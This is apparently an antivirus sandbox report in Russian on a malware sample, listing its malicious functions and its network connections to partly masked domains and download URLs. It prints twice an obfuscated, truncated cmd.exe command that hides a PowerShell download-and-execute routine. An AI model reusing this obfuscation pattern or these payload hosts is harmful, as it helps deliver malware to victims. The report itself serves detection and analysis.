Техническая информация
Вредоносные функции
Загружает файлы и запускает на исполнение.
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\cmd.exe' /V/C"^s^e^t ^2Cv=^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^}^}^{^hc^t^ac^};^k^aerb;^a^G^P^$^ ^m^e^t^I^-^ekovn^I^;)^a^G^P^$^ ^,^J^P^G^$(e^l^i^F^d^ao^ln^w^o^D^.^J^A^h^$^{^yr^t^{)^kR^a^$^ n^i^ ^JP^G^$(^h...
Сетевая активность
Подключается к
- 'ch########r-couvreur-gironde.com':80
- 'su#####e-dj-team.com':80
- 'sp####amaxima.com':80
- 'dc.##egt.com':80
TCP
Запросы HTTP GET
- http://ch########r-couvreur-gironde.com/2Agu5kOrh7
- http://su#####e-dj-team.com/2Atuefrxm
- http://sp####amaxima.com/IXx8GGy
UDP
- DNS ASK ho####oodgossip.biz
- DNS ASK ch########r-couvreur-gironde.com
- DNS ASK su#####e-dj-team.com
- DNS ASK sp####amaxima.com
- DNS ASK dc.##egt.com
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\cmd.exe' /V/C"^s^e^t ^2Cv=^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^}^}^{^hc^t^ac^};^k^aerb;^a^G^P^$^ ^m^e^t^I^-^ekovn^I^;)^a^G^P^$^ ^,^J^P^G^$(e^l^i^F^d^ao^ln^w^o^D^.^J^A^h^$^{^yr^t^{)^kR^a^$^ n^i^ ^JP^G^$(^h...' (со скрытым окном)
